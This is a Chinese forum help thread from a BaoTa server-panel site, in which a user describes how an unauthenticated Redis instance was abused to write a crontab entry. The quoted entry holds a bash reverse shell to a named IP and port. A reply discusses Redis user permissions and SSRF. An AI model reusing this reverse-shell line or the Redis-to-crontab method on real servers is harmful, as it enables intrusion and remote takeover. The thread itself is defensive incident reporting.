当前位置:论坛首页 > Linux面板 > 求助

【已解答】Redis疑惑

发表在 Linux面板2023-11-3 11:21 [复制链接] 2 2455

发现一个被攻击漏洞,2023年4月份安装的宝塔7.9.8版本,redis没有设置密码,但没有开外部端口,黑客通过宝塔面板端口修改redis的值,添加了一段mars  **** root bin/sh bash -i >&/dev/tcp/8.137.10.80/4050 0>&1 键值对,然后修改redis保存路径和名字到etc/crontab 。机器就被控制。发现后关闭所有端口排查问题,只要开放宝塔端口,就会被一波带走,通过netstat查看也发现宝塔端口pyrhon3上有国外ip连接。

使用道具 举报 只看该作者 回复
发表于 2023-11-3 11:28:41 | 显示全部楼层
redis 启动的账户为redis  是没有权限写入到/etc/crontab 中的。

你的redis 是启动的用户是否为root 。

修改redis 的值的方式可以有很多,例如网站存在ssrf 漏洞是可以修改redis 的内容的
使用道具 举报 回复 支持 反对
发表于 2023-11-3 11:37:57 | 显示全部楼层
好的,这边加您的QQ询问一下呢
使用道具 举报 回复 支持 反对
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

普通问题处理

论坛响应时间:72小时

问题处理方式:排队(仅解答)

工作时间:白班:9:00 - 18:00

紧急运维服务

响应时间:3分钟

问题处理方式:宝塔专家1对1服务

工作时间:工作日:9:00 - 18:30

宝塔专业团队为您解决服务器疑难问题

点击联系技术分析

工作时间:09:00至18:30

快速回复 返回顶部 返回列表